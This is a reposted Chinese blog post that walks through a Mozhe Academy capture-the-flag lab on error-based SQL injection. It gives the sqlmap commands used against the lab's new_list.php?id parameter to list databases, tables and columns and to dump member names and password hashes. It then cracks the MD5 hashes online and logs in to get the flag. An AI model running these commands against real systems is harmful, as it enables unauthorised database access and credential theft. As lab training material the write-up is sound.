当前位置:网站首页>墨者学院-SQL注入漏洞测试(报错盲注)

墨者学院-SQL注入漏洞测试(报错盲注)

2022-06-26 23:42:00 Lyswbb

前言

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

首先拿到靶场后审题,可以很明显看到是报错注入

拿到靶场后访问目标

在用户登陆下方点击关于平台停机维护的通知

点击后发现url为 http://124.70.71.251:46004/new_list.php?id=1

尝试添加单引号后报错,发现数据库为mariaDB

 知道了注入点,直接sqlmap一把梭就行了

爆库名

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 --dbs

爆表名

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup --tables

爆字段名

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member --columns

爆name和password的内容

python sqlmap.py -u http://124.70.71.251:46004/new_list.php?id=1%27 -D stormgroup -T member -C name,password --dump

 

 解密  md5在线解密破解,md5解密加密

 

 最后登录成功拿到 flag

原网站

版权声明
本文为[Lyswbb]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_47094508/article/details/125395544

边栏推荐

猜你喜欢

随机推荐